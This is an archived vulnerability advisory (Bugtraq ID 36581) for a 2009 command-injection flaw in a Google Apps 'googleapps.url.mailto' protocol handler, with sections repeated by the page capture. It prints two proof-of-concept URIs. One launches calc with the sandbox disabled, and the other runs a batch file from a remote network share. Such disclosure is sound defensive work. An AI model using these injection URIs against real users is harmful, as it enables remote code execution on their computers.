Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability
BID:36581
Info
Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability
| Bugtraq ID: | 36581 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 01 2009 12:00AM |
| Updated: | Oct 02 2009 11:30PM |
| Credit: | nine:situations:group::pyrokinesis |
| Vulnerable: |
Google Apps 1.1.110.6031 |
| Not Vulnerable: | |
Discussion
Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability
Google Apps is prone to a vulnerability that lets attackers inject commands through a protocol handler. This issue occurs because the application fails to adequately sanitize user-supplied input.
Exploiting this issue would permit remote attackers to inject and execute commands with the privileges of a user running the application. An attacker can launch arbitrary applications from the local computer or an accessible network share.
This issue is reported to affect Google Apps 1.1.110.6031 when used with Microsoft Internet Explorer 7 and Google Chrome 2.0.172.43
Google Apps is prone to a vulnerability that lets attackers inject commands through a protocol handler. This issue occurs because the application fails to adequately sanitize user-supplied input.
Exploiting this issue would permit remote attackers to inject and execute commands with the privileges of a user running the application. An attacker can launch arbitrary applications from the local computer or an accessible network share.
This issue is reported to affect Google Apps 1.1.110.6031 when used with Microsoft Internet Explorer 7 and Google Chrome 2.0.172.43
Exploit / POC
Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability
The following example URIs are available:
googleapps.url.mailto://"%20--domain="--what%20--renderer-path=calc%20--no-sandbox%20--x"/
googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\www.example.com\uncshare\sh.bat%20--no-sandbox%20--x"/
The following example URIs are available:
googleapps.url.mailto://"%20--domain="--what%20--renderer-path=calc%20--no-sandbox%20--x"/
googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\www.example.com\uncshare\sh.bat%20--no-sandbox%20--x"/
Solution / Fix
Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Google Apps 'googleapps.url.mailto' Handler Command Injection Vulnerability
References:
References:
- Google Apps (Google)
- google apps googleapps.url.mailto:// uri handler cross-browser remote command ex (nine:situations:group::pyrokinesis)
- google apps googleapps.url.mailto:// uri handler cross-browser remote command ex ([email protected])